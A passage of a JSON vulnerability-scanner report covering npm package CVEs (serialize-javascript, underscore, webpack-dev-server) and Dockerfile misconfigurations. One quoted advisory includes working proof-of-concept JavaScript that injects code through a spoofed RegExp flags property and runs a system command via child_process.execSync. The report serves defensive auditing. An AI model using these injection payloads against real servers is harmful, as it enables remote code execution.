},
{
"VulnerabilityID": "CVE-2026-34043",
"PkgID": "serialize-javascript@4.0.0",
"PkgName": "serialize-javascript",
"PkgIdentifier": {
"PURL": "pkg:npm/serialize-javascript@4.0.0"
},
"InstalledVersion": "4.0.0",
"FixedVersion": "7.0.5",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34043",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "serialize-javascript: serialize-javascript: Denial of Service via specially crafted array-like object serialization",
"Description": "Serialize JavaScript to a superset of JSON that includes regular expressions and functions. Prior to version 7.0.5, there is a Denial of Service (DoS) vulnerability caused by CPU exhaustion. When serializing a specially crafted \"array-like\" object (an object that inherits from Array.prototype but has a very large length property), the process enters an intensive loop that consumes 100% CPU and hangs indefinitely. This issue has been patched in version 7.0.5.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-400",
"CWE-834"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 3,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.9
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.9
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-34043",
"https://github.com/yahoo/serialize-javascript",
"https://github.com/yahoo/serialize-javascript/commit/f147e90269b58bb6e539cfdf3d0e20d6ad14204b",
"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.5",
"https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-qj8w-gfj5-8c6v",
"https://nvd.nist.gov/vuln/detail/CVE-2026-34043",
"https://www.cve.org/CVERecord?id=CVE-2026-34043"
],
"PublishedDate": "2026-03-31T03:15:58.4Z",
"LastModifiedDate": "2026-04-03T16:53:52.573Z"
},
{
"VulnerabilityID": "GHSA-5c6j-r48x-rmvq",
"PkgID": "serialize-javascript@6.0.2",
"PkgName": "serialize-javascript",
"PkgIdentifier": {
"PURL": "pkg:npm/serialize-javascript@6.0.2"
},
"InstalledVersion": "6.0.2",
"FixedVersion": "7.0.3",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://github.com/advisories/GHSA-5c6j-r48x-rmvq",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()",
"Description": "### Impact\n\nThe serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.\n\nWhile `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`.\n\nIf an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `<script>` tags), the injected code executes.\n\n```javascript\nconst serialize = require('serialize-javascript');\n// Create an object that passes instanceof RegExp with a spoofed .flags\nconst fakeRegex = Object.create(RegExp.prototype);\nObject.defineProperty(fakeRegex, 'source', { get: () => 'x' });\nObject.defineProperty(fakeRegex, 'flags', {\n get: () => '\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"'\n});\nfakeRegex.toJSON = function() { return '@placeholder'; };\nconst output = serialize({ re: fakeRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\")}\nlet obj;\neval('obj = ' + output);\nconsole.log(global.PWNED); // \"CODE_INJECTION_VIA_FLAGS\" \u2014 injected code executed!\n#h2. PoC 2: Code Injection via Date.toISOString()\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst fakeDate = Object.create(Date.prototype);\nfakeDate.toISOString = function() { return '\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"'; };\nfakeDate.toJSON = function() { return '2024-01-01'; };\nconst output = serialize({ d: fakeDate });\n// Output: {\"d\":new Date(\"\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\")}\neval('obj = ' + output);\nconsole.log(global.DATE_PWNED); // \"DATE_INJECTION\" \u2014 injected code executed!\n#h2. PoC 3: Remote Code Execution\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst rceRegex = Object.create(RegExp.prototype);\nObject.defineProperty(rceRegex, 'source', { get: () => 'x' });\nObject.defineProperty(rceRegex, 'flags', {\n get: () => '\"+require(\"child_process\").execSync(\"id\").toString()+\"'\n});\nrceRegex.toJSON = function() { return '@rce'; };\nconst output = serialize({ re: rceRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+require(\"child_process\").execSync(\"id\").toString()+\"\")}\n// When eval'd on a Node.js server, executes the \"id\" system command\n```\n\n### Patches\n\nThe fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
"Severity": "HIGH",
"VendorSeverity": {
"ghsa": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 8.1
}
},
"References": [
"https://github.com/advisories/GHSA-hxcc-f52p-wc94",
"https://github.com/yahoo/serialize-javascript",
"https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9",
"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
"https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq",
"https://nvd.nist.gov/vuln/detail/CVE-2020-7660"
],
"PublishedDate": "2026-02-28T02:50:45Z",
"LastModifiedDate": "2026-03-02T16:17:35Z"
},
{
"VulnerabilityID": "CVE-2026-34043",
"PkgID": "serialize-javascript@6.0.2",
"PkgName": "serialize-javascript",
"PkgIdentifier": {
"PURL": "pkg:npm/serialize-javascript@6.0.2"
},
"InstalledVersion": "6.0.2",
"FixedVersion": "7.0.5",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34043",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "serialize-javascript: serialize-javascript: Denial of Service via specially crafted array-like object serialization",
"Description": "Serialize JavaScript to a superset of JSON that includes regular expressions and functions. Prior to version 7.0.5, there is a Denial of Service (DoS) vulnerability caused by CPU exhaustion. When serializing a specially crafted \"array-like\" object (an object that inherits from Array.prototype but has a very large length property), the process enters an intensive loop that consumes 100% CPU and hangs indefinitely. This issue has been patched in version 7.0.5.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-400",
"CWE-834"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 3,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.9
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.9
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-34043",
"https://github.com/yahoo/serialize-javascript",
"https://github.com/yahoo/serialize-javascript/commit/f147e90269b58bb6e539cfdf3d0e20d6ad14204b",
"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.5",
"https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-qj8w-gfj5-8c6v",
"https://nvd.nist.gov/vuln/detail/CVE-2026-34043",
"https://www.cve.org/CVERecord?id=CVE-2026-34043"
],
"PublishedDate": "2026-03-31T03:15:58.4Z",
"LastModifiedDate": "2026-04-03T16:53:52.573Z"
},
{
"VulnerabilityID": "CVE-2026-27601",
"PkgID": "underscore@1.13.6",
"PkgName": "underscore",
"PkgIdentifier": {
"PURL": "pkg:npm/underscore@1.13.6"
},
"InstalledVersion": "1.13.6",
"FixedVersion": "1.13.8",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27601",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "Underscore.js: Underscore.js: Denial of Service via recursive data structures in flatten and isEqual functions",
"Description": "Underscore.js is a utility-belt library for JavaScript. Prior to 1.13.8, the _.flatten and _.isEqual functions use recursion without a depth limit. Under very specific conditions, detailed below, an attacker could exploit this in a Denial of Service (DoS) attack by triggering a stack overflow. Untrusted input must be used to create a recursive datastructure, for example using JSON.parse, with no enforced depth limit. The datastructure thus created must be passed to _.flatten or _.isEqual. In the case of _.flatten, the vulnerability can only be exploited if it is possible for a remote client to prepare a datastructure that consists of arrays at all levels AND if no finite depth limit is passed as the second argument to _.flatten. In the case of _.isEqual, the vulnerability can only be exploited if there exists a code path in which two distinct datastructures that were submitted by the same remote client are compared using _.isEqual. For example, if a client submits data that are stored in a database, and the same client can later submit another datastructure that is then compared to the data that were saved in the database previously, OR if a client submits a single request, but its data are parsed twice, creating two non-identical but equivalent datastructures that are then compared. Exceptions originating from the call to _.flatten or _.isEqual, as a result of a stack overflow, are not being caught. This vulnerability is fixed in 1.13.8.",
"Severity": "HIGH",
"CweIDs": [
"CWE-770"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 3,
"redhat": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.9
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-27601",
"https://github.com/jashkenas/underscore",
"https://github.com/jashkenas/underscore/commit/411e222eb0ca5d570cc4f6315c02c05b830ed2b4",
"https://github.com/jashkenas/underscore/commit/a6e23ae9647461ec33ad9f92a2ecfc220eea0a84",
"https://github.com/jashkenas/underscore/issues/3011",
"https://github.com/jashkenas/underscore/security/advisories/GHSA-qpx9-hpmf-5gmw",
"https://nvd.nist.gov/vuln/detail/CVE-2026-27601",
"https://underscorejs.org/#1.13.8",
"https://underscorejs.org/#flatten",
"https://underscorejs.org/#isEqual",
"https://www.cve.org/CVERecord?id=CVE-2026-27601"
],
"PublishedDate": "2026-03-03T23:15:55.56Z",
"LastModifiedDate": "2026-03-05T21:08:35.32Z"
},
{
"VulnerabilityID": "CVE-2025-30359",
"PkgID": "webpack-dev-server@4.15.2",
"PkgName": "webpack-dev-server",
"PkgIdentifier": {
"PURL": "pkg:npm/webpack-dev-server@4.15.2"
},
"InstalledVersion": "4.15.2",
"FixedVersion": "5.2.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-30359",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "webpack-dev-server: webpack-dev-server information exposure",
"Description": "webpack-dev-server allows users to use webpack with a development server that provides live reloading. Prior to version 5.2.1, webpack-dev-server users' source code may be stolen when they access a malicious web site. Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject a malicious script in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables. By using `Function::toString` against the values in `__webpack_modules__`, the attacker can get the source code. Version 5.2.1 contains a patch for the issue.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-749"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 5.3
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"V3Score": 5.9
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 5.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2025-30359",
"https://github.com/webpack/webpack-dev-server",
"https://github.com/webpack/webpack-dev-server/commit/5c9378bb01276357d7af208a0856ca2163db188e",
"https://github.com/webpack/webpack-dev-server/commit/d2575ad8dfed9207ed810b5ea0ccf465115a2239",
"https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-4v9v-hfq4-rm2v",
"https://nvd.nist.gov/vuln/detail/CVE-2025-30359",
"https://www.cve.org/CVERecord?id=CVE-2025-30359"
],
"PublishedDate": "2025-06-03T18:15:25.243Z",
"LastModifiedDate": "2025-10-03T01:12:23.03Z"
},
{
"VulnerabilityID": "CVE-2025-30360",
"PkgID": "webpack-dev-server@4.15.2",
"PkgName": "webpack-dev-server",
"PkgIdentifier": {
"PURL": "pkg:npm/webpack-dev-server@4.15.2"
},
"InstalledVersion": "4.15.2",
"FixedVersion": "5.2.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-30360",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "webpack-dev-server: webpack-dev-server information exposure",
"Description": "webpack-dev-server allows users to use webpack with a development server that provides live reloading. Prior to version 5.2.1, webpack-dev-server users' source code may be stolen when you access a malicious web site with non-Chromium based browser. The `Origin` header is checked to prevent Cross-site WebSocket hijacking from happening, which was reported by CVE-2018-14732. But webpack-dev-server always allows IP address `Origin` headers. This allows websites that are served on IP addresses to connect WebSocket. An attacker can obtain source code via a method similar to that used to exploit CVE-2018-14732. Version 5.2.1 contains a patch for the issue.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-346"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 6.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 6.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 6.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2025-30360",
"https://github.com/webpack/webpack-dev-server",
"https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127",
"https://github.com/webpack/webpack-dev-server/commit/5c9378bb01276357d7af208a0856ca2163db188e",
"https://github.com/webpack/webpack-dev-server/commit/72efaab83381a0e1c4914adf401cbd210b7de7eb",
"https://github.com/webpack/webpack-dev-server/commit/d2575ad8dfed9207ed810b5ea0ccf465115a2239",
"https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-9jgg-88mc-972h",
"https://nvd.nist.gov/vuln/detail/CVE-2025-30360",
"https://www.cve.org/CVERecord?id=CVE-2025-30360"
],
"PublishedDate": "2025-06-03T18:15:25.41Z",
"LastModifiedDate": "2025-11-21T18:26:18.64Z"
}
]
},
{
"Target": "Dockerfile",
"Class": "config",
"Type": "dockerfile",
"MisconfSummary": {
"Successes": 23,
"Failures": 1,
"Exceptions": 0
},
"Misconfigurations": [
{
"Type": "Dockerfile Security Check",
"ID": "DS002",
"AVDID": "AVD-DS-0002",
"Title": "Image user should not be 'root'",
"Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.",
"Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument",
"Namespace": "builtin.dockerfile.DS002",
"Query": "data.builtin.dockerfile.DS002.deny",
"Resolution": "Add 'USER <non root user name>' line to the Dockerfile",
"Severity": "HIGH",
"PrimaryURL": "https://avd.aquasec.com/misconfig/ds002",
"References": [
"https://docs.docker.com/develop/develop-images/dockerfile_best-practices/",
"https://avd.aquasec.com/misconfig/ds002"
],
"Status": "FAIL",
"Layer": {},
"CauseMetadata": {
"Provider": "Dockerfile",
"Service": "general",
"Code": {
"Lines": null
}
}
}
]
},
{
"Target": "node_modules/@surma/rollup-plugin-off-main-thread/Dockerfile",
"Class": "config",
"Type": "dockerfile",
"MisconfSummary": {
"Successes": 21,
"Failures": 3,
"Exceptions": 0
},
"Misconfigurations": [
{
"Type": "Dockerfile Security Check",
"ID": "DS001",
"AVDID": "AVD-DS-0001",
"Title": "':latest' tag used",
"Description": "When using a 'FROM' statement you should use a specific tag to avoid uncontrolled behavior when the image is updated.",
"Message": "Specify a tag in the 'FROM' statement for image 'selenium/node-chrome'",
"Namespace": "builtin.dockerfile.DS001",
"Query": "data.builtin.dockerfile.DS001.deny",
"Resolution": "Add a tag to the image in the 'FROM' statement",
"Severity": "MEDIUM",
"PrimaryURL": "https://avd.aquasec.com/misconfig/ds001",
"References": [
"https://avd.aquasec.com/misconfig/ds001"
],
"Status": "FAIL",
"Layer": {},
"CauseMetadata": {
"Provider": "Dockerfile",
"Service": "general",
"StartLine": 1,
"EndLine": 1,
"Code": {
"Lines": [
{
"Number": 1,
"Content": "FROM selenium/node-chrome:latest",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[38;5;64mFROM\u001b[0m\u001b[38;5;37m selenium/node-chrome:latest",
"FirstCause": true,
"LastCause": true
}
]
}
}
},
{
"Type": "Dockerfile Security Check",
"ID": "DS002",
"AVDID": "AVD-DS-0002",
"Title": "Image user should not be 'root'",
"Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.",
"Message": "Last USER command in Dockerfile should not be 'root'",
"Namespace": "builtin.dockerfile.DS002",
"Query": "data.builtin.dockerfile.DS002.deny",
"Resolution": "Add 'USER <non root user name>' line to the Dockerfile",
"Severity": "HIGH",
"PrimaryURL": "https://avd.aquasec.com/misconfig/ds002",
"References": [
"https://docs.docker.com/develop/develop-images/dockerfile_best-practices/",
"https://avd.aquasec.com/misconfig/ds002"
],
"Status": "FAIL",
"Layer": {},
"CauseMetadata": {
"Provider": "Dockerfile",
"Service": "general",
"StartLine": 3,
"EndLine": 3,
"Code": {
"Lines": [
{
"Number": 3,
"Content": "USER root",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[38;5;64mUSER\u001b[0m\u001b[38;5;37m root",
"FirstCause": true,
"LastCause": true
}
]
}
}
},
{
"Type": "Dockerfile Security Check",
"ID": "DS017",
"AVDID": "AVD-DS-0017",
"Title": "'RUN <package-manager> update' instruction alone",
"Description": "The instruction 'RUN <package-manager> update' should always be followed by '<package-manager> install' in the same RUN statement.",
"Message": "The instruction 'RUN <package-manager> update' should always be followed by '<package-manager> install' in the same RUN statement.",
"Namespace": "builtin.dockerfile.DS017",
"Query": "data.builtin.dockerfile.DS017.deny",
"Resolution": "Combine '<package-manager> update' and '<package-manager> install' instructions to single one",
"Severity": "HIGH",
"PrimaryURL": "https://avd.aquasec.com/misconfig/ds017",
"References": [
"https://docs.docker.com/develop/develop-images/instructions/#run",
"https://avd.aquasec.com/misconfig/ds017"
],
"Status": "FAIL",
"Layer": {},
"CauseMetadata": {
"Provider": "Dockerfile",
"Service": "general",
"StartLine": 5,
"EndLine": 8,
"Code": {
"Lines": [
{
"Number": 5,
"Content": "RUN apt-get update -qqy \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[38;5;64mRUN\u001b[0m apt-get update -qqy \u001b[38;5;124m\\",
"FirstCause": true,
"LastCause": false
},
{
"Number": 6,
"Content": " && rm -rf /var/lib/apt/lists/* /var/cache/apt/* \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m \u001b[38;5;245m&&\u001b[0m rm -rf /var/lib/apt/lists/* /var/cache/apt/* \u001b[38;5;124m\\",
"FirstCause": false,
"LastCause": false
},
{
"Number": 7,
"Content": " && rm /bin/sh && ln -s /bin/bash /bin/sh \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m \u001b[38;5;245m&&\u001b[0m rm /bin/sh \u001b[38;5;245m&&\u001b[0m ln -s /bin/bash /bin/sh \u001b[38;5;124m\\",
"FirstCause": false,
"LastCause": false
},
{
"Number": 8,
"Content": " && chown seluser /usr/local",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m \u001b[38;5;245m&&\u001b[0m chown seluser /usr/local",
"FirstCause": false,
"LastCause": true
}
]
}
}
}
]
},
{
"Target": "node_modules/jsonpath/Dockerfile",
"Class": "config",
"Type": "dockerfile",
"MisconfSummary": {
"Successes": 23,
"Failures": 1,
"Exceptions": 0
},
"Misconfigurations": [
{
"Type": "Dockerfile Security Check",
"ID": "DS002",
"AVDID": "AVD-DS-0002",
"Title": "Image user should not be 'root'",
"Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.",
"Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument",
"Namespace": "builtin.dockerfile.DS002",
"Query": "data.builtin.dockerfile.DS002.deny",
"Resolution": "Add 'USER <non root user name>' line to the Dockerfile",
"Severity": "HIGH",
"PrimaryURL": "https://avd.aquasec.com/misconfig/ds002",
"References": [
"https://docs.docker.com/develop/develop-images/dockerfile_best-practices/",
"https://avd.aquasec.com/misconfig/ds002"
],
"Status": "FAIL",
"Layer": {},
"CauseMetadata": {
"Provider": "Dockerfile",
"Service": "general",
"Code": {
"Lines": null
}
}
}
]
}
]
}